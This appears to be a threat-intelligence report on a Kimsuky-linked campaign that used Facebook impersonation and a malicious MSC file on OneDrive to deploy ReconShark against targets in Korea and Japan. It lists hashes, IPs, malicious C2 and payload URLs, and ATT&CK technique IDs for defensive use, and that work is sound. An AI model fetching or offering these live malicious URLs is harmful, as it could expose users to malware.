APT attack discovered using Facebook and MS management console (Attack signs detected targeting Korea and Japan)

May 21, 2024, 11:37 a.m.

Description

A threat actor impersonated a North Korean human rights official on Facebook and approached targets. They shared malicious URLs disguised as documents. Microsoft OneDrive cloud service was used to host the malicious MSC file, which communicated with C2 servers and deployed Reconshark malware associated with the Kimsuky group. Signs of similar attacks targeting Japan were also observed.

External References

https://www.genians.co.kr/blog/threat_intelligence/facebook
https://otx.alienvault.com/pulse/664c824398761b028f8bcb9d
Tags
apt
kimsuky
northkorea
2024-05-21

Date

  • Created: May 21, 2024, 11:15 a.m.
  • Published: May 21, 2024, 11:15 a.m.
  • Modified: May 21, 2024, 11:37 a.m.

Indicators

  • 2f7f3a86a868f6c5a85fb12fe028fd254cd9622075b179923187461c72d6aea0
  • 2209f27b08fc10118ef03ca983f1bbdff3ca2371a02382f9f34f64fdcae07ffe
  • 9c6f6db86b5ccdda884369c9c52dd8568733e126e6fe9c2350707bb6d59744a1
  • 52.177.14.24
  • 5.9.123.217
  • 199.59.243.225
  • 162.0.209.91
  • 162.0.209.27
  • http://worldinfocontact.club/111/kfrie/cow.php
  • http://worldinfocontact.club/111/d.php
  • http://rfa.ink/bio/d.php?na=vbtmp
  • http://rfa.ink/bio/d.php?na=battmp
  • http://rapportdown.lol/rapport/com/ca.php?na=video.gif
  • http://rapportdown.lol/rapport/com/
  • http://nuclearpolicy101.org/wp-admin/includes/lee/leeplug/cow.php
  • http://nuclearpolicy101.org/wp-admin/includes/0603/d.php?na=
  • http://nuclearpolicy101.org/wp-admin/includes/0421/d.php?na=vbtmp
  • http://mitmail.tech/gorgon/ca.php?na=video.gif
  • http://mitmail.tech/gorgon/ca.php
  • http://joongang.site/pprb/sec/d.php
  • http://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
  • http://ielsems.com/romeo/d.php?na=vbtmp
  • http://dusieme.com/panda/d.php?na=vbtmp
  • http://ielsems.com/panda
  • http://dusieme.com/panda/TBS
  • http://dusieme.com/hwp/d.php?na=sched
  • http://dusieme.com/js/cic0117/ca.php?na=dot_emsi.gif
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-marker/ayaka
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-maker/kohei/r.php
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-maker/essay/d.php?na=battmp
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-
  • http://beastmodser.club/sil/0304/d.php?na
  • http://brandwizer.co.in/green_pad/wp-
  • http://beastmodser.club/sil/0304/VOA_Korea.docx
  • worldinfocontact.club
  • rapportdown.lol
  • nuclearpolicy101.org
  • makeoversalon.net.in
  • ielsems.com
  • joongang.site
  • dusieme.com
  • brandwizer.co
  • brandwizer.co.in
  • beastmodser.club
  • yonsei.lol
  • mitmail.tech
Download all indicators here!

Attack Patterns

  • reconshark
  • Kimsuky
  • T1064
  • T1567
  • T1497
  • T1057
  • T1083
  • T1071
  • T1543
  • T1055
  • T1219
  • T1053
  • T1112
  • T1041
  • T1059

Additional Informations

  • Japan